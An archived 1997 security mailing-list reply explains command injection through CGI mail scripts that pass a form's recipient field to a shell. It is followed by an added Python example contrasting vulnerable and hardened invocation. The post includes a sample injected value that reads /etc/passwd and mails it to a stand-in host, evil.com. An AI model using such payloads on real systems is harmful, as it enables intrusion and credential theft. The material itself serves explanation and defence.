[4068] in WWW Security List Archive
Re: E-mail
daemon@ATHENA.MIT.EDU (Murple)
Sat Jan 25 13:50:25 1997
From: Murple <btherl@ariel.ucs.unimelb.edu.au>
To: www-security@ns2.rutgers.edu
Date: Sun, 26 Jan 1997 02:37:06 +1100 (EST)
Errors-To: owner-www-security@ns2.rutgers.edu
> >I'd like to know if this program exists...
> >It's a program that you send an e-mail to someone... then... it brings me back
> >the passwd file... I'd like to know this...
> >By xande
>
> it is bullshit unless the email contains an executable and you are dumb enough
> to run it....

Maybe he means this all too common bug:

    <form method="Get" action="http://www.unaware.com/cgi-bin/mail.pl">
    <input type=hidden name="recipient" value="blithely@unaware.com">
    ...

where, given a badly enough written mailing script, tacking a ';' onto the
end of the email address will let you execute arbitrary commands, e.g.

    "blithely@unaware.com ; cat /etc/passwd | mail me@evil.com ;"

which will work if the mail command is executed by a shell, and the recipient
is passed unescaped as an argument.
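
Added example, not part of the original post and not code from any real mail script: the shell-built command line described above next to an argv-based, validated form. The mailer is a stand-in that only prints its arguments, and FAKE_MAILER, ADDRESS_RE, the function names and the sample input are all assumptions made for illustration.

```python
import re
import shlex
import subprocess
import sys

# Stand-in for the mail binary (assumption): prints the arguments it was
# given, so the demo runs offline and sends nothing.
FAKE_MAILER = [sys.executable, "-c", "import sys; print(repr(sys.argv[1:]))"]

# Conservative allow-list (assumption; not a full RFC 5322 parser). The first
# character may not be '-', so the value cannot be read as a mailer option.
ADDRESS_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._%+-]*@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def send_via_shell(recipient):
    """Pattern from the post: the form field is pasted into a shell command."""
    cmd = " ".join(shlex.quote(part) for part in FAKE_MAILER) + " " + recipient
    done = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return done.stdout.splitlines()


def send_via_argv(recipient):
    """No shell: the field reaches the mailer as exactly one argument."""
    done = subprocess.run(FAKE_MAILER + [recipient], capture_output=True, text=True)
    return done.stdout.splitlines()


def send_checked(recipient):
    """Hardened form: reject anything that is not a plain address, then use argv."""
    if not ADDRESS_RE.fullmatch(recipient):
        raise ValueError("rejected recipient: %r" % recipient)
    return send_via_argv(recipient)


# Constructed input: an address followed by a harmless marker command.
HOSTILE = "user@example.com ; echo INJECTED"

if __name__ == "__main__":
    print("shell:", send_via_shell(HOSTILE))   # second command runs
    print("argv: ", send_via_argv(HOSTILE))    # whole string is one argument
    try:
        send_checked(HOSTILE)
    except ValueError as exc:
        print("check:", exc)
```

Passing the field as a list element removes the shell from the path entirely; the allow-list is a second layer that also stops a value beginning with '-' from being parsed as an option by a real mailer.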